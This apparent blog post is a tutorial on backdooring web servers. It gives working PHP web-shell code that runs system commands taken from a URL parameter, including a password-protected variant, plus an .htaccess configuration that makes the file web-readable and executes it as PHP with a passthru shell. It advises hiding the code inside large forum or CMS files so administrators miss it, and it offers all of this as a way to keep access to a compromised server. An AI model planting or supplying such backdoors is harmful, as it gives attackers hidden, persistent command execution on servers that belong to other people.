Sometimes it is needed to backdoor php files on the server to have a way to get it back.
Note! Im not talking about encoding a php file to insert a backdoor on it, this is just a form which allows you to execute system commands.
Im gonna show two ways to do this, using .htaccess and php files itself.
The good of the php method is that it can be inserted at any php file, for example a large forum/cms file where the admin wont be able to find it.
A simple php backdoor:
<?php system($_GET['c']); ?> Go to site.com/filename.php?c=whoami (filename= file name you saved it, whoami= system command)
Gr8, but what if we want our backdoor password protected?
<?php if(isset($_GET['pass']) && $_GET['pass'] == 'yourpass'){ system($_GET['c']);} ?> Now go to site.com/filename.php?pass=yourpass&c=whoami
Htaccess backdoor:
By default viewing .htaccess files on browser is disabled by the server, so firsly we allow viewing of php files:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files> Then we change the type to php executable, meaning that the file will run as php script:
AddType application/x-httpd-php .htaccess And in the end we add the backdoor code:
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?> Full script:
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ###### This Features are also avaiable in albozz shell, for more you may also want to check weevely, awesome php backdoor.
No comments:
Post a Comment